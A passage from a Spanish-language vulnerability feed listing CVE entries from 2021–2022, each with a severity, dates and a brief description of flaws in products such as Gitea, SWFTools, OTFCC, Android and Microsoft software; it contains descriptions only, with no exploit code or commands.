    En Gitea versiones anteriores a 1.16.9, era posible que usuarios añadieran incidencias existentes a los proyectos. Debido a controles de acceso inapropiados, un atacante podía asignar cualquier incidencia a cualquier proyecto en Gitea (no había comprobación de permisos para obtener la incidencia). Como resultado, el atacante podía acceder a títulos de las incidencias privadas.
  • Vulnerabilidad en el repositorio de GitHub cockpit-hq/cockpit (CVE-2022-2818)
    Severidad: Pendiente de análisis
    Fecha de publicación: 15/08/2022
    Fecha de última actualización: 02/08/2023
    Una Omisión de Autenticación por Debilidad Primaria en el repositorio de GitHub cockpit-hq/cockpit versiones anteriores a 2.2.2.
  • CVE-2022-37438
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 21/07/2023
    En las versiones de Splunk Enterprise de la siguiente tabla, un usuario autenticado puede diseñar un panel de control que podría filtrar información (por ejemplo, nombre de usuario, correo electrónico y nombre real) sobre los usuarios de Splunk, cuando es visitado por otro usuario por medio del componente drilldown. La vulnerabilidad requiere el acceso del usuario para crear y compartir cuadros de mando usando Splunk Web.
  • CVE-2022-35110
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que el commit 772e55a2 de SWFTools contiene una pérdida de memoria por medio del archivo /lib/mem.c.
  • CVE-2022-35109
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que el commit 772e55a2 de SWFTools contenía un desbordamiento del búfer de la pila por medio de la función draw_stroke en el archivo /gfxpoly/stroke.c.
  • CVE-2022-35108
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que el commit 772e55a2 de SWFTools contenía una violación de segmentación por medio de la función DCTStream::getChar() en el archivo /xpdf/Stream.cc.
  • CVE-2022-35106
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que el commit 772e55a2 de SWFTools contenía una violación de segmentación por medio de la función FoFiTrueType::computeTableChecksum(unsigned char*, int) en el archivo /xpdf/FoFiTrueType.cc.
  • CVE-2022-35105
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que el commit 772e55a2 de SWFTools contiene un desbordamiento del búfer de la pila por medio de /bin/png2swf+0x552cea.
  • CVE-2022-35104
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que el commit 772e55a2 de SWFTools contenía un desbordamiento del búfer de la pila por medio de la función DCTStream::reset() en el archivo /xpdf/Stream.cc.
  • CVE-2022-35101
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que el commit 772e55a2 de SWFTools contiene una violación de segmentación por medio del archivo /multiarch/memset-vec-unaligned-erms.S.
  • CVE-2022-34259
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 21/07/2023
    Adobe Commerce versiones 2.4.3-p2 (y anteriores), 2.3.7-p3 (y anteriores) y 2.4.4 (y anteriores) están afectadas por una vulnerabilidad de Control de Acceso Inapropiado que podría resultar en una omisión de la funcionalidad de Seguridad. Un atacante podría aprovechar esta vulnerabilidad para afectar a la disponibilidad de una característica menor de un usuario. No es requerida una interacción del usuario para la explotación de este problema.
  • CVE-2021-45454
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/08/2022
    Fecha de última actualización: 08/08/2023
    Ampere Altra versiones anteriores a SRP 1.08b y Altra Max versiones anteriores a SRP 2.05, permiten una divulgación de información de telemetría de energía por medio de HWmon.
  • CVE-2022-35485
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que OTFCC versión v0.10.4, contenía una violación de segmentación por medio de /release-x64/otfccdump+0x703969.
  • CVE-2022-35484
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que OTFCC versión v0.10.4, contiene una violación de segmentación por medio de /release-x64/otfccdump+0x6b6a8f.
  • CVE-2022-35483
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que OTFCC versión v0.10.4, contiene una violación de segmentación por medio de /release-x64/otfccdump+0x5266a8.
  • CVE-2022-35476
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que OTFCC versión v0.10.4, contiene una violación de segmentación por medio de /release-x64/otfccdump+0x4fbc0b.
  • CVE-2022-35482
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que OTFCC versión v0.10.4, contenía una violación de segmentación por medio de /release-x64/otfccdump+0x65f724.
  • CVE-2022-35481
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que OTFCC versión v0.10.4, contiene una violación de segmentación por medio del archivo /multiarch/memmove-vec-unaligned-erms.S.
  • CVE-2022-35479
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que OTFCC versión v0.10.4, contenía una violación de segmentación por medio de /release-x64/otfccdump+0x4fbbb6.
  • CVE-2022-35478
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que OTFCC versión v0.10.4, contenía una violación de segmentación por medio de /release-x64/otfccdump+0x6babea.
  • CVE-2022-35477
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que OTFCC versión v0.10.4, contenía una violación de segmentación por medio de /release-x64/otfccdump+0x4fe954.
  • CVE-2022-36152
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que tifig versión v0.2.2, contiene una pérdida de memoria por medio del operador new[](unsigned long) en el archivo /asan/asan_new_delete.cpp.
  • CVE-2022-36153
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que tifig versión v0.2.2, contenía una violación de segmentación por medio de la función std::vector(unsigned int, std::allocator(unsigned int) ): size() const en el archivo /bits/stl_vector.h.
  • CVE-2022-36151
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que tifig versión v0.2.2, contiene una violación de segmentación por medio de la función getType() en el archivo /common/bbox.cpp.
  • CVE-2022-36150
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que tifig versión v0.2.2, contenía un desbordamiento del búfer de la pila por medio de la función __asan_memmove en el archivo /asan/asan_interceptors_memintrinsics.cpp.
  • CVE-2022-35114
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que el commit 772e55a2 de SWFTools contenía una violación de segmentación por medio de la función extractFrame en el archivo /readers/swf.c.
  • CVE-2022-35100
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que el commit 772e55a2 de SWFTools contenía una violación de segmentación por medio de la función gfxline_getbbox en el archivo /lib/gfxtools.c.
  • CVE-2022-35113
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que el commit 772e55a2 de SWFTools contenía un desbordamiento del búfer de la pila por medio de la función swf_DefineLosslessBitsTagToImage en el archivo /modules/swfbits.c.
  • CVE-2022-33939
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    El controlador CENTUM VP / CS 3000 FCS (CP31, CP33, CP345, CP401 y CP451) contiene un problema en el procesamiento de paquetes de comunicación, que puede conllevar a un consumo de recursos. Si es aprovechada esta vulnerabilidad, un atacante puede causar una condición de denegación de servicio (DoS) en la comunicación ADL mediante el envío de un paquete especialmente diseñado al producto afectado.
  • CVE-2022-36273
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Tenda AC9 versión V15.03.2.21_cn, es vulnerable a una inyección de comandos por medio de goform/SetSysTimeCfg.
  • CVE-2022-0996
    Severidad: MEDIA
    Fecha de publicación: 23/03/2022
    Fecha de última actualización: 08/08/2023
    Se encontró una vulnerabilidad en 389 Directory Server que permite que las contraseñas caducadas accedan a la base de datos para causar una autenticación inapropiada
  • CVE-2022-29959
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/08/2022
    Fecha de última actualización: 08/08/2023
    Emerson OpenBSI versiones hasta 29-04-2022, maneja inapropiadamente el almacenamiento de credenciales. Es un entorno de ingeniería para la línea de RTUs ControlWave y Bristol Babcock. Este entorno proporciona la funcionalidad de control de acceso mediante la autenticación de usuarios y la administración de privilegios. Las credenciales de varios usuarios son almacenan de forma no segura en el archivo SecUsers.ini usando una simple transformación de cadenas en lugar de un mecanismo criptográfico.
  • CVE-2022-36215
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que DedeBIZ versión v6, contiene una vulnerabilidad de ejecución de código remota en el archivo sys_info.php.
  • CVE-2022-34294
    Severidad: Pendiente de análisis
    Fecha de publicación: 15/08/2022
    Fecha de última actualización: 08/08/2023
    totd versión 1.5.3, usa un puerto de origen UDP fijo en las consultas ascendentes enviadas a los resolvedores de DNS. Esto permite el envenenamiento de la caché de DNS porque no se presenta suficiente entropía para prevenir ataques de inyección de tráfico.
  • CVE-2022-35147
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/08/2022
    Fecha de última actualización: 08/08/2023
    DoraCMS versiones v2.18 y anteriores, permiten a atacantes omitir la autenticación de inicio de sesión por medio de una petición HTTP diseñada.
  • CVE-2022-35122
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/08/2022
    Fecha de última actualización: 08/08/2023
    Un problema de control de acceso en Ecowitt GW1100 Series Weather Stations versiones anteriores a GW1100B_v2.1.5 incluyéndola, permite a atacantes no autenticados acceder a información confidencial, incluyendo las contraseñas del dispositivo y del WiFi local.
  • CVE-2022-20330
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Bluetooth, es posible conectar o desconectar dispositivos bluetooth sin que el usuario sea consciente de ello debido a una falta de comprobación de permisos. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-181962588
  • CVE-2022-20329
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Wifi, se presenta una posible forma de habilitar Wifi sin permisos debido a una falta de comprobación de permisos. Esto podría conllevar a una escalada local de privilegios sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-183410556
  • CVE-2022-20328
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En PackageManager, se presenta una posible forma de determinar si una aplicación está instalada debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-184948501
  • CVE-2022-20327
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Wi-Fi, se presenta una posible forma de recuperar el SSID de WiFi sin permisos de localización debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución User necesarios. Es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-185126813
  • CVE-2022-20326
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Telephony, se presenta una posible divulgación de los identificadores de la tarjeta SIM debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-185235527
  • CVE-2022-20323
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En PackageManager, se presenta una posible divulgación de la instalación de paquetes debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-187176203
  • CVE-2022-20322
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En PackageManager, se presenta una posible divulgación de paquetes instalados debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-187176993
  • CVE-2022-20321
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Settings, es posible que una aplicación sin permisos pueda leer el contenido de los códigos QR de WiFi debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. Es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-187176859
  • CVE-2022-20268
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En RestrictionsManager, se presenta una posible forma de enviar una transmisión que debería estar restringida a las aplicaciones del sistema debido a una omisión de permisos. Esto podría conllevar a una escalada local de privilegios en un dispositivo gestionado por la empresa sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-210468836
  • CVE-2022-20267
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En bluetooth, se presenta una posible forma de activar o desactivar la conexión bluetooth sin el consentimiento del usuario debido a una falta de comprobación de permisos. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-211646835
  • CVE-2022-20265
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Settings, se presenta una posible forma de omitir los permisos de restablecimiento de fábrica debido a una omisión de permisos. Esto podría conllevar a una escalada local de privilegios con acceso físico al dispositivo sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-212804898
  • CVE-2022-20263
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En ActivityManager, se presenta una forma de leer el estado del proceso para otros usuarios debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local del uso de la aplicación con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-217935264
  • CVE-2022-20262
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En ActivityManager, se presenta una posible forma de comprobar las capacidades de otro proceso debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-218338453
  • CVE-2022-20261
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En LocationManager, se presenta una posible forma de obtener información de ubicación debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-219835125
  • CVE-2022-20260
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Phone app, se presenta un posible bloqueo de bucle debido a un agotamiento de recursos. Esto podría conllevar a una denegación de servicio local persistente en la aplicación Teléfono con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-220865698
  • CVE-2022-20259
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Telephony, se presenta un posible filtrado de ICCID y EID debido a una falta de comprobación de permisos. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-221431393
  • CVE-2022-20256
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Audio HAL, se presenta una posible escritura fuera de límites debido a una condición de carrera. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución System necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-222572821
  • CVE-2022-20255
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En SettingsProvider, es posible leer o cambiar el tono de llamada predeterminado debido a una falta de comprobación de permisos. Esto podría conllevar a una escalada local de privilegios sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-222687217
  • CVE-2022-20254
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Wi-Fi, se presenta una omisión de permisos. Esto podría conllevar a una escalada local de privilegios desde el usuario invitado sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-223377547
  • CVE-2022-20253
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/08/2022
    Fecha de última actualización: 08/08/2023
    En Bluetooth, se presenta un posible fallo de limpieza debido a una excepción no capturada. Esto podría conllevar a una denegación de servicio remota en Bluetooth sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-13, ID de Android: A-224545125
  • CVE-2022-35198
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/08/2022
    Fecha de última actualización: 08/08/2023
    Contract Management System versión v2.0, contiene una contraseña débil por defecto que permite a atacantes acceder a la información de conexión de la base de datos.
  • CVE-2022-35153
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que FusionPBX versión 5.0.1, contiene una vulnerabilidad de inyección de comandos por medio del archivo /fax/fax_send.php.
  • CVE-2022-34009
    Severidad: Pendiente de análisis
    Fecha de publicación: 27/07/2022
    Fecha de última actualización: 08/08/2023
    Fossil versión 2.18 en Windows permite a atacantes causar una denegación de servicio (bloqueo de demonio) por medio de una carga útil de tipo XSS en un ticket. Esto ocurre porque los datos del ticket son almacenados en un archivo temporal, y el producto no maneja apropiadamente la ausencia de este archivo después de que Windows Defender lo haya marcado como malware
  • CVE-2022-27373
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que el router fir302b A2 de Shanghai Feixun Data Communication Technology Co. contiene una vulnerabilidad de ejecución de comandos remota (RCE) por medio de la función Ping.
  • CVE-2022-2478
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/07/2022
    Fecha de última actualización: 12/08/2023
    Un uso de memoria previamente liberada en PDF en Google Chrome versiones anteriores a 103.0.5060.134 permitía a un atacante remoto explotar potencialmente la corrupción de la pila por medio de una página HTML diseñada
  • CVE-2022-2480
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/07/2022
    Fecha de última actualización: 12/08/2023
    Un uso de memoria previamente liberada en Service Worker API en Google Chrome versiones anteriores a 103.0.5060.134, permitía a un atacante remoto explotar potencialmente la corrupción de la pila por medio de una página HTML diseñada
  • CVE-2022-1048
    Severidad: MEDIA
    Fecha de publicación: 29/04/2022
    Fecha de última actualización: 04/08/2023
    Se ha encontrado un fallo de uso de memoria previamente liberada en el subsistema de sonido del kernel de Linux en la forma en que un usuario desencadena las llamadas concurrentes de PCM hw_params. La ioctls hw_free o una condición de carrera similar ocurre dentro de ALSA PCM para otras ioctls. Este defecto permite a un usuario local bloquear o potencialmente escalar sus privilegios en el sistema
  • CVE-2021-20355
    Severidad: MEDIA
    Fecha de publicación: 24/06/2022
    Fecha de última actualización: 08/08/2023
    IBM Jazz Team Server versiones 6.0.6, 6.0.6.1, 7.0, 7.0.1 y 7.0.2, podría permitir a un atacante remoto obtener información confidencial, causada por el fallo en la configuración del flag HTTPOnly. Un atacante remoto podría aprovechar esta vulnerabilidad para obtener información confidencial de la cookie. IBM X-Force ID: 194891
  • CVE-2021-20543
    Severidad: BAJA
    Fecha de publicación: 24/06/2022
    Fecha de última actualización: 08/08/2023
    IBM Jazz Team Server versiones 6.0.6, 6.0.6.1, 7.0, 7.0.1 y 7.0.2, es vulnerable a una inyección de HTML. Un atacante remoto podría inyectar código HTML malicioso que, cuando es visualizado, es ejecutado en el navegador web de la víctima dentro del contexto de seguridad del sitio de alojamiento. IBM X-Force ID: 198929
  • CVE-2021-38879
    Severidad: MEDIA
    Fecha de publicación: 24/06/2022
    Fecha de última actualización: 08/08/2023
    IBM Jazz Team Server versiones 6.0.6, 6.0.6.1, 7.0, 7.0.1 y 7.0.2 podría permitir a un atacante remoto obtener información confidencial, causada por el fallo en la configuración del flag HTTPOnly. Un atacante remoto podría aprovechar esta vulnerabilidad para obtener información confidencial de la cookie. IBM X-Force ID: 209057
  • CVE-2021-39409
    Severidad: ALTA
    Fecha de publicación: 24/06/2022
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad en Online Student Rate System versión v1.0, que permite a cualquier usuario registrarse como administrador sin necesidad de autenticarse
  • CVE-2022-22414
    Severidad: BAJA
    Fecha de publicación: 20/06/2022
    Fecha de última actualización: 08/08/2023
    IBM Robotic Process Automation versión 21.0.2, podría permitir a un usuario local obtener credenciales de configuración de servicios web confidenciales de la memoria del sistema. IBM X-Force ID: 223026
  • CVE-2021-26422
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Ejecución de Código Remota de Skype for Business y Lync
  • CVE-2021-28479
    Severidad: BAJA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Divulgación de Información de Windows CSC Service
  • CVE-2021-31171
    Severidad: BAJA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Divulgación de Información de Microsoft SharePoint
  • CVE-2021-31173
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Divulgación de Información de Microsoft SharePoint Server
  • CVE-2021-31174
    Severidad: BAJA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Divulgación de Información de Microsoft Excel
  • CVE-2021-31178
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Divulgación de Información de Microsoft Office
  • CVE-2021-31184
    Severidad: BAJA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Divulgación de Información de Microsoft Windows Infrared Data Association (IrDA)
  • CVE-2021-31186
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Divulgación de Información de Windows Remote Desktop Protocol (RDP)
  • CVE-2021-31191
    Severidad: BAJA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Divulgación de Información de Windows Projected File System FS Filter Driver
  • Vulnerabilidad en Microsoft Exchange Server (CVE-2021-31198)
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Ejecución de Código Remota de Microsoft Exchange Server. Este ID de CVE es diferente de CVE-2021-31195
  • CVE-2021-35394
    Severidad: ALTA
    Fecha de publicación: 16/08/2021
    Fecha de última actualización: 08/08/2023
    SDK de Realtek Jungle versiones v2.x hasta v3.4.14B, proporciona una herramienta de diagnóstico llamada "MP Daemon" que normalmente es compilado como binario "UDPServer". El binario está afectado por múltiples vulnerabilidades de corrupción de memoria y una vulnerabilidad de inyección de comandos arbitrarios que puede ser explotada por atacantes no autenticados remotos.
  • CVE-2021-40870
    Severidad: ALTA
    Fecha de publicación: 13/09/2021
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Aviatrix Controller versiones 6.x anteriores a 6.5-1804.1922. Es posible una carga sin restricciones de un archivo de tipo peligroso, que permite a un usuario no autenticado ejecutar código arbitrario por medio de un salto de directorio
  • CVE-2022-34008
    Severidad: ALTA
    Fecha de publicación: 21/06/2022
    Fecha de última actualización: 08/08/2023
    Comodo Antivirus versión 12.2.2.8012, presenta un fallo de cuarentena que permite una escalada de privilegios. Para escalar privilegios, un atacante con pocos privilegios puede usar una unión de directorios NTFS para restaurar una DLL maliciosa de la cuarentena a la carpeta System32
  • CVE-2021-29768
    Severidad: MEDIA
    Fecha de publicación: 24/06/2022
    Fecha de última actualización: 08/08/2023
    IBM Cognos Analytics versiones 11.1.7, 11.2.0 y 11.2.1, podría permitir a un usuario de bajo nivel obtener información confidencial de los detalles de la página "Cloud Storage" a la que no debería tener acceso. IBM X-Force ID: 202682
  • CVE-2021-40892
    Severidad: MEDIA
    Fecha de publicación: 24/06/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de Denegación de Servicio de Expresiones Regulares (ReDOS) en validate-color versión v2.1.0, cuando son manejadas cadenas rgb(a) no válidas diseñadas
  • CVE-2022-1517
    Severidad: ALTA
    Fecha de publicación: 24/06/2022
    Fecha de última actualización: 08/08/2023
    LRM usa altos privilegios. Un actor malicioso no autenticado puede cargar y ejecutar código de forma remota a nivel del sistema operativo, lo que puede permitir a un atacante cambiar los ajustes, configuraciones, software o acceder a datos confidenciales en el producto afectado. Un atacante también podría explotar esta vulnerabilidad para acceder a APIs no destinadas al uso general e interactuar mediante la red
  • CVE-2022-1521
    Severidad: MEDIA
    Fecha de publicación: 24/06/2022
    Fecha de última actualización: 08/08/2023
    LRM no implementa la autenticación ni la autorización por defecto. Un actor malicioso puede inyectar, reproducir, modificar y/o interceptar datos confidenciales
  • CVE-2022-23171
    Severidad: ALTA
    Fecha de publicación: 21/06/2022
    Fecha de última actualización: 08/08/2023
    AtlasVPN - Escalada de privilegios La falta de controles de seguridad apropiados en los mensajes de named pipe puede permitir a un atacante con bajos privilegios enviar una carga útil maliciosa y conseguir permisos SYSTEM en un ordenador con Windows donde esté instalado el cliente AtlasVPN
  • CVE-2022-29500
    Severidad: ALTA
    Fecha de publicación: 05/05/2022
    Fecha de última actualización: 08/08/2023
    SchedMD Slurm versiones 21.08.x hasta 20.11.x, presenta un Control de Acceso Incorrecto que conlleva a una Divulgación de Información
  • CVE-2022-33913
    Severidad: MEDIA
    Fecha de publicación: 20/06/2022
    Fecha de última actualización: 08/08/2023
    En Mahara versiones 21.04 anteriores a 21.04.6, 21.10 anteriores a 21.10.4 y 22.04.2, a veces pueden descargarse archivos mediante el archivo thumb.php sin comprobación de permisos
  • CVE-2022-26936
    Severidad: MEDIA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información de Windows Server Service
  • Vulnerabilidad en .NET Framework de Microsoft (CVE-2022-30130)
    Severidad: MEDIA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 05/06/2023
    Una vulnerabilidad de Denegación de Servicio en .NET Framework
  • CVE-2022-26940
    Severidad: MEDIA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información de Remote Desktop Protocol Client
  • CVE-2022-26938
    Severidad: MEDIA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Storage Spaces Direct. Este ID de CVE es diferente de CVE-2022-26932, CVE-2022-26939
  • CVE-2022-26935
    Severidad: BAJA
    Fecha de publicación: 10/05/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información de Windows WLAN AutoConfig Service
  • CVE-2021-26347
    Severidad: MEDIA
    Fecha de publicación: 11/05/2022
    Fecha de última actualización: 08/08/2023
    El problema de TOCTOU (time-of-check to time-of-use) en la Unidad de Administración del Sistema (SMU) puede resultar en un DMA (acceso directo a memoria) a una dirección de DRAM no válida que podría resultar en una denegación de servicio
  • CVE-2022-26612
    Severidad: ALTA
    Fecha de publicación: 07/04/2022
    Fecha de última actualización: 08/08/2023
